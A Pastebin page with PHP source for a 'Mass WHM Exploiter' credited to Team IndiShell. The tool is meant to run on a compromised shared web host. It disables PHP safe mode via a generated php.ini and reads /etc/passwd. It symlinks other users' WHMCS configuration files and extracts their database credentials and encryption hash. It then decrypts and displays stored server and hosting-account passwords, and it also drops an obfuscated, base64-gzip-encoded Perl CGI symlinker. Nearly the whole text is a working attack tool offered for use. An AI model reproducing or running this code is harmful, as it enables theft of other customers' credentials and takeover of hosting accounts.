API tools faq
paste
Advertisement
Kyfx

Mass WHM Exploiter [ IndiShell ]

Kyfx
Feb 18th, 2015
482
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.65 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3.  
  4. $head = '
  5. <html>
  6. <head>
  7. </script>
  8. <title>--==[[ Mannu,Mass WHM exploiter By Team IndiShell]]==--</title>
  9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  10.  
  11. <STYLE>
  12. body {
  13. font-family: Tahoma
  14. }
  15. tr {
  16. BORDER: dashed 2px #333;
  17. color: #FFF;
  18. }
  19.  
  20. .table1 {
  21. BORDER: 0px Black;
  22. BACKGROUND-COLOR: Black;
  23. color: #FFF;
  24. }
  25. .td1 {
  26. BORDER: 0px;
  27. BORDER-COLOR: #333333;
  28. font: 7pt Verdana;
  29. color: Green;
  30. }
  31. .tr1 {
  32. BORDER: 0px;
  33. BORDER-COLOR: #333333;
  34. color: #FFF;
  35. }
  36. table {
  37. BORDER: dashed 2px #333;
  38. BORDER-COLOR: #333333;
  39. BACKGROUND-COLOR: Black;
  40. color: #FFF;
  41. }
  42. input {
  43. border : solid 3px ;
  44. border-color : #333;
  45. BACKGROUND-COLOR: white;
  46. font: 11pt Verdana;
  47. color: #333;
  48. }
  49. select {
  50. BORDER-RIGHT: Black 1px solid;
  51. BORDER-TOP: #DF0000 1px solid;
  52. BORDER-LEFT: #DF0000 1px solid;
  53. BORDER-BOTTOM: Black 1px solid;
  54. BORDER-color: #FFF;
  55. BACKGROUND-COLOR: Black;
  56. font: 8pt Verdana;
  57. color: Red;
  58. }
  59. submit {
  60. BORDER: buttonhighlight 2px outset;
  61. BACKGROUND-COLOR: Black;
  62. width: 30%;
  63. color: #FFF;
  64. }
  65. textarea {
  66. border : dashed 1px #333;
  67. BACKGROUND-COLOR: Black;
  68. font: Fixedsys bold;
  69. color: #999;
  70. }
  71. BODY {
  72. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  73. margin: 1px;
  74. color: Red;
  75. background-color: Black;
  76. }
  77. .main {
  78. margin : -287px 0px 0px -490px;
  79. BORDER: dashed 1px #333;
  80. BORDER-COLOR: #333333;
  81. }
  82. .tt {
  83. background-color: Black;
  84. }
  85.  
  86. A:link {
  87. COLOR: White; TEXT-DECORATION: none
  88. }
  89. A:visited {
  90. COLOR: White; TEXT-DECORATION: none
  91. }
  92. A:hover {
  93. color: Red; TEXT-DECORATION: none
  94. }
  95. A:active {
  96. color: Red; TEXT-DECORATION: none
  97. }
  98. </STYLE>
  99. <script language=\'javascript\'>
  100. function hide_div(id)
  101. {
  102. document.getElementById(id).style.display = \'none\';
  103. document.cookie=id+\'=0;\';
  104. }
  105. function show_div(id)
  106. {
  107. document.getElementById(id).style.display = \'block\';
  108. document.cookie=id+\'=1;\';
  109. }
  110. function change_divst(id)
  111. {
  112. if (document.getElementById(id).style.display == \'none\')
  113. show_div(id);
  114. else
  115. hide_div(id);
  116. }
  117. </script>'; ?>
  118. <html>
  119. <head>
  120. <?php
  121. echo $head ;
  122. echo '
  123.  
  124. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  125.  
  126.  
  127.  
  128. <td align=center valign="top" rowspan="1"><font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu ]]==--</font><br>
  129. <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Auto mass </font><font color=white size=5 face="comic sans ms"><b> WHM exploiter By</font><font color=green size=5 face="comic sans ms"><b> Team IndiShell ]]==--</font> <div class="hedr">
  130.  
  131. <td height="10" align="left" class="td1"></td></tr><tr><td
  132. align="center" valign="top" rowspan="1"><font
  133. color="red" face="comic sans ms"size="1"><b>
  134. <font color=#ff9933>
  135. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br><font color=#ff9933> JamvanHax0r, Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,cool toad,cool shavik<br>Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,cyber warrior,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,lovetherisk<br>Suriya Prakash,cyber gladiator,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Mannu, ViKi ,Budhaoo, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand, [#] BlackHat Cyber Crew [#] ,silent hacker and all federate of TEAM INDISHELL<br>
  136.  
  137. <font color=white>--==[[Dedicated to]]==--</font>
  138. <br># My Father and my Ex Teacher #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font><br><font color=#ff9933>
  139. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
  140.  
  141. </table>
  142. </table> <div align=center><font color=#ff9933 font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">love happen only once.....Rest is life......</span></marquee><br></font></div><div align=center><font color=#ff9933 font size=4>--==[[ Code for India,Hack for India,Die for India ]]==--</font>
  143.  
  144. ';
  145.  
  146. ?><div align=center><font color=white font size=2>Special Thanks to Rab3oun bhai ji(coder of whm killer script)<p>
  147. <table ><td><font size=4>--==[[ </font><a href=<?php echo "?phpi";?>><font color=white size=4><u>Generate PHP.INI file</u></font></a><font color=red>|>>+++++<<|
  148. <a href=<?php echo "?wkiller";?>><font color=white size=4><u>Auto mass whm exploiter</u></font></a>|>>+++++<<|
  149. <a href=<?php echo "?safe";?>><font color=white size=4><u>safemode mass symlinker</u></font></a></font><font size=4> ]]==--</font></td></table>
  150. <?php
  151. if(isset($_GET['phpi']))
  152. {
  153. $pi=fopen("php.ini",w);
  154. $da="disable_functions=none\nsafe_mode=off";
  155. fwrite($pi,$da);
  156.  
  157. echo "<br><br><a href=php.ini><font color=white size=2><u>link to php.ini file</u></font></a>";
  158. }
  159. ?>
  160.  
  161. <?php
  162. if(isset($_GET['wkiller']))
  163. {
  164.  
  165. ?>
  166.  
  167. <br><table width=30% >
  168. <tr>
  169. <td align=right width=50%>
  170. <br>
  171. <font color=red size=3>
  172. WHM =><br>
  173. Cpanel => <br>
  174.  
  175. <br>
  176. </td>
  177. <td align=left >
  178. <form method="post"><br>
  179.  
  180. <input type="checkbox" name="config[]" value="whm"><br>
  181. <input type="checkbox" name="config[]" value="cpanel"><br>
  182.  
  183. </td>
  184. </tr>
  185. </table><br>
  186.  
  187.  
  188.  
  189. Bhiyu....Just click the button given below and i will exploit all the symlinked whmcs on this server very hard :|<br>
  190. <input type=submit name=whmcs value="kerde khaat khadi >.<"><p>
  191. </form>
  192. <?php
  193. }?>
  194.  
  195. <?php
  196. set_time_limit(0);
  197. error_reporting(0);
  198. if(isset($_POST['whmcs']))
  199. {
  200.  
  201. mkdir('ICa',0777);
  202. $rr = " <Files *.php>
  203. ForceType application/x-httpd-php4
  204. </Files>
  205. Options FollowSymLinks MultiViews Indexes ExecCGI
  206. AddType application/x-httpd-cgi .ica
  207. AddHandler cgi-script .ica
  208. AddHandler cgi-script .ica";
  209. $g = fopen('ICa/.htaccess','w');
  210. fwrite($g,$rr);
  211. $users=file("/etc/passwd");
  212. foreach($users as $user)
  213. {
  214. $str=explode(":",$user);
  215. $us=$str[0];
  216. $r="ICa/";
  217. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  218. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  219. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  220. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  221. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  222. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  223. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  224. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  225. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  226. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  227. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  228. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  229. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  230. symlink('/home/'.$us.'/public_html/manage/configuration.php',$r.$us.'..whmcs-manage');
  231. symlink('/home/'.$us.'/public_html/order/configuration.php',$r.$us.'..whmcs-order');
  232.  
  233. }
  234.  
  235.  
  236. function decrypt ($string,$cc_encryption_hash)
  237.  
  238. {
  239. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  240. $hash_key = _hash ($key);
  241. $hash_length = strlen ($hash_key);
  242. $string = base64_decode ($string);
  243. $tmp_iv = substr ($string, 0, $hash_length);
  244. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  245. $iv = $out = ';
  246. $c = 0;
  247. while ($c < $hash_length)
  248. {
  249. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  250. ++$c;
  251. }
  252. $key = $iv;
  253. $c = 0;
  254. while ($c < strlen ($string))
  255. {
  256. if (($c != 0 AND $c % $hash_length == 0))
  257. {
  258. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  259. }
  260. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  261. ++$c;
  262. }
  263. return $out;
  264. }
  265.  
  266. function _hash ($string)
  267. {
  268. $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
  269. $out = ';
  270. $c = 0;
  271. while ($c < strlen ($hash))
  272. {
  273. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  274. $c += 2;
  275. }
  276. return $out;
  277. }
  278. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  279. {
  280.  
  281. $ar0=explode($marqueurDebutLien, $text);
  282. $ar1=explode($marqueurFinLien, $ar0[1]);
  283. $ar=trim($ar1[0]);
  284. return $ar;
  285. }
  286.  
  287. function data($lu)
  288. {
  289. $ch = curl_init();
  290.  
  291. curl_setopt($ch, CURLOPT_URL, $lu);
  292. curl_setopt($ch, CURLOPT_HEADER, 1);
  293. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  294. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  295. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  296. $result['EXE'] = curl_exec($ch);
  297. curl_close($ch);
  298. return $result['EXE'];
  299.  
  300. }
  301.  
  302. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/ICa/";
  303. $re=$r;
  304. $uss=file("/etc/passwd");
  305. foreach($uss as $uer)
  306. {
  307. $whmcsc=array("..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill","..whmcs-manage","..whmcs-order");
  308. foreach($whmcsc as $whmcscon)
  309. {
  310.  
  311. $su=explode(":",$uer);
  312. $usess=$su[0];
  313. $finalurl=$re.$usess.$whmcscon;
  314.  
  315. foreach($_POST['config'] as $check)
  316. {
  317. if($check == "whm")
  318. {
  319.  
  320. $content=data($finalurl);
  321.  
  322.  
  323. if($content && preg_match('/cc_encryption_hash/i',$content))
  324. {
  325.  
  326. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usess user's website whmcs bhaiyu xD </font></td></tr></table>";
  327.  
  328. $dbu=entre2v2($content,"db_username = '","';");
  329. $dbp=entre2v2($content,"db_password = '","';");
  330. $dbn=entre2v2($content,"db_name = '","';");
  331. $dbch=entre2v2($content,"cc_encryption_hash = '","';");
  332.  
  333.  
  334.  
  335. $dbu1=entre2v2($content,"db_username = \"","\";");
  336. $dbp1=entre2v2($content,"db_password = \"","\";");
  337. $dbn1=entre2v2($content,"db_name = \"","\";");
  338. $dbch1=entre2v2($content,"cc_encryption_hash = \"","\";");
  339.  
  340. if(!empty($dbu))
  341. {
  342. $uhost="localhost";
  343. $duser=trim($dbu);
  344. $dpass=trim($dbp);
  345. $ddb=trim($dbn);
  346. $cc_encryption_hash=trim($dbch);
  347.  
  348.  
  349. if(@mysql_connect($uhost,$duser,$dpass) && mysql_select_db($ddb))
  350. {
  351. echo "connected";
  352. $query = mysql_query("SELECT * FROM tblservers");
  353. echo "<table border='1' cellpadding='2' align='center'>
  354. <tr><td>Type</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
  355. while($v = mysql_fetch_array($query)) {
  356. echo "<tr>
  357. <td>{$v['type']}</td><td>{$v['active']}</td><td>{$v['ipaddress']}</td><td>{$v['username']}</td><td>".decrypt($v['password'],
  358. $cc_encryption_hash)."</td>
  359. </tr>";
  360. }
  361. echo "</table>";
  362. }
  363. }
  364. if(!empty($dbu1)){
  365.  
  366. $uhost1="localhost";
  367. $duser1=trim($dbu1);
  368. $dpass1=trim($dbp1);
  369. $ddb1=trim($dbn1);
  370. $cc_encryption_hash1=trim($dbch1);
  371. if(@mysql_connect($uhost1,$duser1,$dpass1) && mysql_select_db($ddb1))
  372. {
  373. echo "connected";
  374. $query = mysql_query("SELECT * FROM tblservers");
  375. echo "<table border='1' cellpadding='2' align='center'>
  376. <tr><td>Type</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
  377. while($v = mysql_fetch_array($query)) {
  378. echo "<tr>
  379. <td>{$v['type']}</td><td>{$v['active']}</td><td>{$v['ipaddress']}</td><td>{$v['username']}</td><td>".decrypt($v['password'],
  380. $cc_encryption_hash1)."</td>
  381. </tr>";
  382. }
  383. echo "</table>";
  384. }
  385.  
  386. }
  387.  
  388.  
  389. }
  390. }
  391. }
  392. /////////////////////
  393. /// cpanel //////
  394. /////////////////////
  395. if($check == "cpanel")
  396. {
  397. $content=data($finalurl);
  398.  
  399.  
  400. if($content && preg_match('/cc_encryption_hash/i',$content))
  401. {
  402.  
  403.  
  404. $dbu=entre2v2($content,"db_username = '","';");
  405. $dbp=entre2v2($content,"db_password = '","';");
  406. $dbn=entre2v2($content,"db_name = '","';");
  407. $dbch=entre2v2($content,"cc_encryption_hash = '","';");
  408.  
  409.  
  410.  
  411. $dbu1=entre2v2($content,"db_username = \"","\";");
  412. $dbp1=entre2v2($content,"db_password = \"","\";");
  413. $dbn1=entre2v2($content,"db_name = \"","\";");
  414. $dbch1=entre2v2($content,"cc_encryption_hash = \"","\";");
  415. if(!empty($dbu))
  416. {
  417. $uhost="localhost";
  418. $duser=trim($dbu);
  419. $dpass=trim($dbp);
  420. $ddb=trim($dbn);
  421. $cc_encryption_hash=trim($dbch);
  422. if(@mysql_connect($uhost,$duser,$dpass) && mysql_select_db($ddb))
  423.  
  424. {
  425. $query = mysql_query("SELECT * FROM tblhosting");
  426. echo "<table border='1' cellpadding='5' align='center'><tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
  427. while($v = mysql_fetch_array($query)) {
  428. echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v['assignedips']}</td></tr>";
  429. }
  430. echo "</table>";
  431. }
  432. if(!empty($dbu1)){
  433.  
  434. $uhost1="localhost";
  435. $duser1=trim($dbu1);
  436. $dpass1=trim($dbp1);
  437. $ddb1=trim($dbn1);
  438. $cc_encryption_hash1=trim($dbch1);
  439. if(@mysql_connect($uhost1,$duser1,$dpass1) && mysql_select_db($ddb1))
  440. {
  441. $query = mysql_query("SELECT * FROM tblhosting");
  442. echo "<table border='1' cellpadding='5' align='center'><tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
  443. while($v = mysql_fetch_array($query)) {
  444. echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v['assignedips']}</td></tr>";
  445. }
  446. echo "</table>";
  447. }
  448. }
  449. }
  450. }
  451. }
  452. //////////////
  453. //end
  454. //////////
  455. }
  456. }
  457. }
  458. ?>
  459.  
  460. <?php
  461. if(isset($_GET['safe']))
  462. {
  463. ?>
  464. <form method=post>
  465. <input type=submit name=passx value="cat /etc/passwd"><p></form>
  466. <?php
  467. if(isset($_POST['passx']))
  468. {
  469. ?>
  470. <textarea style="background:black;color:white" rows=20 cols=50 name=usernames ><?php $users=file("/etc/passwd");
  471. foreach($users as $user)
  472. {
  473. $str=explode("\n",$user);
  474. echo $str[0]."\n";
  475. }
  476.  
  477. ?></textarea>
  478. <?php
  479. }
  480.  
  481.  
  482.  
  483. ?>
  484. <form method=post>
  485.  
  486. <font size=5 color=white>--==[[ <input type=submit name=perl value="click to open symlinker"> ]]==--</font><br><br></form>
  487.  
  488. <?php
  489. }
  490.  
  491.  
  492.  
  493. ?>
  494. <?php
  495. if(isset($_POST['perl']))
  496. {
  497. error_reporting(0);
  498. $da='rVdtc9pGEP7uGf+HzZlG0Fg6sNNOzFvTYhx7xsaprTTNJB2PkA50g96iOwWwh/z27p4AEyeT4E6xQdLe7rN7u3t3j/ae8ELlfCgTnok8AvvMPEep70V86CVBLJPdnSyXiQbWSxMtEm3reSaaoMVM81DH0YfkQ8JaSy2r/eT4sue+e90HGoPXb/44P+sBszl/e9jj/Ng9hr9P3YtzaDh1cHMvUVLLNEF3vD9gwEKtsybn0+nUmR46aT7m7hWfEVaDjJe3tt6wdAIdsO7uTtt4nMVRojrfwGkcHR2V5qWy8AK6xkJ7QNq2+FjIT531NM+9ZFx4Y8HALyUdJhK7UAz4d+1cTM+GzTpPLfBDL1dCdwo9sl8sYbTUkeii7UiOYSKjSORtXgpxVOl5JIASvgTylaLoneAW7nZ3RujEHnmxjOZNcL0wjb3WUqrkLRap8TybrSRTIcehbsIwjQKU+WmU5k3YO8TPaIQCwre9SI6TJvgYushXQhV6QTpFy8jzJ1DPZuZ7YKAXuzt7fij8SVpoUvZy4VFouztTMZxIbQ/TPBC5nXuBLBRG9IsxM4bNMP0k8m+Yp5nnS41zqju/tmCIXsd5WiSBXQZ9aD4I0OYmQZQpvqynheCqGEIkI4yiWimUyGvQgZc3OFCJVY73H2d32TRYkGCSRl6HxA7jzDHaa/FnxT8knI9NuGoeRzKZVC2OWRbcKnUdi2fFMJL+DVWYT8PYV9w3xSxyj9rTycLM2jeAjuU4RsOqtbYEVEWWpbn+LmSp80hgUudvTy++i4zjj0IkwN71D+f/OMwf5xS9/t85NU5Rb3tUP5K4ZrYovo2aj4XdCvWxoGKbYHvnj4bdBvXRwW5dNJvqtj36EHdcmYy3wCXN7XFjL8GjYwvYUnF7YLObboFr9Aws7pNyBNVKf/DXnXXV//NN/9q9uei7p5fH1gLER7BeX167Vo12bdx9g+q1e3w22IfKsBiNRI43xrJ3OXD7A/fmvD945Z5aCwMNIlKCDJfKuLmW2ujl6t3NtXt1NnhlLcooXmaezBWqqCySusqf8rWTmjmk0LsfQoXUoFpqm6iqlcSLBSp/8qJC1O4ROoRAemRvlKDzGXTOn3HgmyLFf6q+9+zR7/ZJ3T76Z+O2xvGsmVRZj+1DKGbVSqNW44L2/NLbA8C17D8hnlxeXdyZoBaUKQO2USEznHlKmbIwVrtbcS8LT7hhGszBj3C4w4JbBsOxOQ07zBzLhtNk3TYd9VAOTEOpRfeLVoGRRD6xbDRiGlmXDre2yrzkC1tmjFmX1l00By60zymyabBiNqDTFRB87UO1OaF18YQ20MO8pDvmio7yGJBAhWnQYVmqNOsi1cnTZGwo0YoHSBx9SA4YUPrQCoNhYI5/zIDp9iYyEgg8FYoAchG0YCoDHTbhsI50pYW1KPnPQfn4FaswaWzBJqdaUiq4Z1RHmW7BkjqhDwY4w1Vo61k+TYYqa5l64I9MskIvo74uhrHUDbakdMo8MjCNgI+ZTEBqeGHXHk6tQVNLMQsB7NXrJ/hZT+/o6EdBN+obUS+naYidYdFUjCaWWeS+p8Q6TweH38jR3slz+msReS2bh+qcx1TnVf2IgS1oX8DufYntIXDJtzd6u0srYU6UzAziU5qJBKoX707Ozvv7wLqYTUfHGaut3iqgHAOGI2D7tyNArmYQUbBwmENyVu4huI4mXqfewt92ZU6XZ89oIWFDR6Ja+nyP0n9oFce86vz8W605a/IxKT1F2kgL9qHjSoOczPTKCfoIOg0ED9qNF3QpfTy0wYENu8Xqf/mmtMWCDg+6QZoIQHp7UC7wsrco95RnOare5wFQsdw0KKHVs8HJ5b5J2TqZ63LQWBfoLSBKlTCq5QmktIiXSardv9PhvoLvOrkYdZi1mXiLEs++3DhMe9brJnxa+6tGNg0XCD8td4kmJDgxtt4gVtuF113NbSNXjPqM0lUyfTwHu5TQfwE=';
  499. $decryp=gzinflate(base64_decode($da));
  500. mkdir('ICa', 0777);
  501. $hope = fopen("ICa/.htaccess", 'w');
  502. $hcon= "<Files *.php>
  503. ForceType application/x-httpd-php4
  504. </Files>
  505. Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .ica\nAddHandler cgi-script .ica\nAddHandler cgi-script .ica
  506. ";
  507. fwrite ( $hope, $hcon ) ;
  508.  
  509. $pelfile = fopen("ICa/in.ica" ,"w");
  510. fwrite ($pelfile,$decryp);
  511. chmod("ICa/in.ica",0755);
  512. echo "<iframe src=ICa/in.ica width=50% height=70% ></iframe><br><br> ";
  513.  
  514. }
  515.  
  516. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!